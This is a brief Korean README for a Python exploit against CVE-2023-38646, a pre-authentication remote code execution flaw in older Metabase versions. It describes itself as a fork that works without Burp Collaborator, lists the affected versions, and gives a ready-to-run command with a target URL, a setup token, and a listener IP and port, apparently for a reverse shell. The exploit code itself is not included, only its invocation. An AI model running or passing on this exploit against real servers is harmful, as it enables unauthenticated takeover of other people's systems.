
Metabase의 CVE-2023-38646 사전 인증 RCE
Burp Collector 없이 사용할 수 있도록 만든 kh4sh3i의 포크입니다.
CVE-2023-38646 (Metabase의 사전 인증 RCE):
0.46.6.1 이전 버전의 Metabase 오픈소스와 1.46.6.1 이전 버전의 Metabase Enterprise는 공격자가 서버의 권한 수준으로 서버에서 임의의 명령을 실행할 수 있게 합니다. 악용을 위해 인증은 필요하지 않습니다.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
자세한 내용은 이 게시물을 참조하세요.